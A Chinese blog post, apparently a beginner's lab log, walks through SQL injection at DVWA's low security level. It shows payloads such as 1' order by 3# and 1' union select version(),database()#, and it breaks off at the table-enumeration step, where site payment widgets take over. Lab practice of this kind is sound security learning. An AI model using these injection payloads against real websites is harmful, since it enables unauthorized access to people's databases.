DVWA(7)SQL注入(SQL Injection) LOW-HIGHT 操作记录

本文分享了在DVWA平台上进行SQL注入攻击的实践经验,详细介绍了Low、Medium和High三种难度级别的具体操作步骤,帮助读者了解SQL注入的工作原理及防御措施。

今天带来第七期SQL注入操作记录。初次接触DVWA,写下自己的操作记录,希望可以帮助每个刚接触DVWA的新手,同时希望可以提升自己的技术。注:如有操作不当的地方希望可以得到大神指导、交流。也感谢之前查阅的各种大神提供的博客。

原理:SQL注入就是通过把SQL命令插入到web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意sql的目的

Low级别

第一步,判断是否可以进行sql注入

输入

1''

不报错表明可以进行字符串注入

第二步,判断SQL查询语句中的字段数

输入

1' order by 3#

查询成功,值为3查询失败,说明最大字段数为2

第三步,判断回显位置

输入

1'union select 1,2

 第四步,查询当前的数据库,以及版本

输入

1' union select version(),database()#

第五步,获取数据库中的表 

输入

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值